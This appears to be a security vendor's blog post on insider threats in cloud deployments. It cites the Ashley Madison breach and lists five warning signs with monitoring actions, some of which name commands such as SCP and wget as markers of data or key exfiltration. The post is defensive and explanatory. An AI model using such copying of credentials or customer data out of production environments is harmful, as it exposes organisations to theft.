“The Call is Coming from Inside the House” Insider Threats Pose Major Security Concerns for Enterprise

Security is a major concern and potential road block for companies starting up in the cloud or considering a move into the cloud. Incidents such as the most recent high-profile attack on “online cheating site” Ashley Madison do little to assuage those fears as companies must consider how to best protect themselves from external and insider threats

Amazon provides a basic tool set for protecting the perimeter with security groups and VPCs, but that is just one piece in a comprehensive strategy to protect against external threats. The bigger challenge, as enterprise customers can testify, is protecting against insider threats. The “threat” here is not just malicious intent of the insiders themselves, but the system misconfigurations that are the entry points external actors utilize to get inside the perimeter.

Brian Krebs from KrebsonSecurity.com sought comment from Avid Life Media (parent organization for Ashley Madison) Chief Executive Noel Biderman on the attack, who shared that the incident “…may have been the work of someone who at least at one time had legitimate, inside access to the company’s networks — perhaps a former employee or contractor.”

Who are these insiders? They may be disgruntled employees or perhaps internal users who are ignorant to how their actions leave the proverbial doors wide open. It may even be a partner.

The following are five markers of insider threats and the corresponding steps security teams can take to address them:

  1. Copying customer data and intellectual property from production environments
    An internal user who copies files from production environments into development or local work stations is a potential threat.

    : Monitor for commands such as SCP and wget. Additionally, monitor for access to critical customer files.

  2. Copying of internal configurations, passwords, certificates and keys
    While this is routinely done for easy access between machines in the production, these actions may still result in passing the “keys of the kingdom” out of the locked-down ops environments.

    Action: Monitor for commands such as SCP and wget. Monitor for access to critical customer files.

  3. Users are not logging in from jump hosts
    Any user who does not follow policy and logs-in from hosts that are not jump hosts is potentially an insider threat.

    Action: Monitor for users’ logins from IPs that are not jump hosts.

  4. When a package gets updated online by hand.
    The package updates in prod environments should be done through configuration management systems such as Chef or Puppet. Instances of package updates done by hand in prod cause major security loopholes because of misconfigured applications.

    Action: Monitor for commands like “apt-get install” or “yum install” by users other than Chef.

  5. Edits of Configuration Files
    Manual edits to configuration files often cause configurations not in line with security policies, thus increasing opportunity to attack surface of prod environments.

    Action: File tracking of changes to key configuration files.

Any type of system breach is a worst nightmare realized by internal security teams and providers alike, but it’s more common than many would believe. In fact, at Threat Stack we have observed many incidences of insider threats in our customers’ deployments, but we’ve caught them because of the quality of information our agent is able to collect. The agent gives us insight and visibility over the entire infrastructure of a customer’s system, including the actions of each user, such as TTY sessions, process and corresponding network behavior and critical file tracking.

By working with security providers who specialize in continuous monitoring in cloud environments, such as Threat Stack, enterprises vastly improve their chances of avoiding external and internal threats. For those who aren’t yet taking this precaution, the Ashely Madison incident may prove to be beneficial in demonstrating what can happen when you leave your cloud data at risk.